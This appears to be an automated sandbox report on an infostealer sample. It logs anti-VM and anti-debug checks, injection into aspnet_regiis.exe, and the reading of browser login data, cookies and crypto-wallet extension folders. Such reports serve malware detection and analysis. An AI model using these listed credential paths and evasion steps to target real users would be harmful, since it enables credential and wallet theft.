            Source: Binary string: mscorlib.ni.pdbRSDS source: WER87AC.tmp.dmp.5.dr
            Source: Binary string: C:\Users\user\Desktop\S#U043eftWare.PDB source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbL0 source: WER87AC.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbe source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\S#U043eftWare.exeUnpacked PE file: 0.2.S#U043eftWare.exe.4f0000.0.unpack :Mn-oI:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
            Source: S#U043eftWare.exeStatic PE information: section name: :Mn-oI
            Source: S#U043eftWare.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_004F2488 push 9A574A02h; retf 0_2_004F248F
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_004F6D74 push edi; retf 0_2_004F6D7F
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_004F370F pushad ; retf 0_2_004F3719
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00945893 push ds; ret 2_2_00945894
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00944D98 push edx; retf 2_2_00944D9B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094458B push ds; ret 2_2_00944594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00947FEF push 0FF1762Bh; iretd 2_2_00947FF4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0094432B pushad ; ret 2_2_00944334
            Source: S#U043eftWare.exeStatic PE information: section name: :Mn-oI entropy: 7.999720145209283
            Source: C:\Users\user\Desktop\S#U043eftWare.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: S#U043eftWare.exe PID: 7624, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: 4FE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: 5FE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: 6110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: 7110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: 7460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: 8460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: 9460000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7748Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: Amcache.hve.5.drBinary or memory string: VMware
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: aspnet_regiis.exe, 00000002.00000003.1878990637.000000000065D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1878990637.0000000000693000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.000000000065D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.0000000000693000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0096D920 LdrInitializeThunk,2_2_0096D920
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD455A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDD455A
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD4529 mov eax, dword ptr fs:[00000030h]0_2_6CDD4529
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD3358 mov eax, dword ptr fs:[00000030h]0_2_6CDD3358
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD613E GetProcessHeap,0_2_6CDD613E
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD455A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDD455A
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD16F1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CDD16F1
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD1BCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDD1BCA
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 930000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 930000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 930000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 931000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 972000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 975000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 986000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 987000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 931000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 972000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 975000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 986000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 987000Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3D7008Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD1D98 cpuid 0_2_6CDD1D98
            Source: C:\Users\user\Desktop\S#U043eftWare.exeQueries volume information: C:\Users\user\Desktop\S#U043eftWare.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 0_2_6CDD1813 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CDD1813
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7700, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
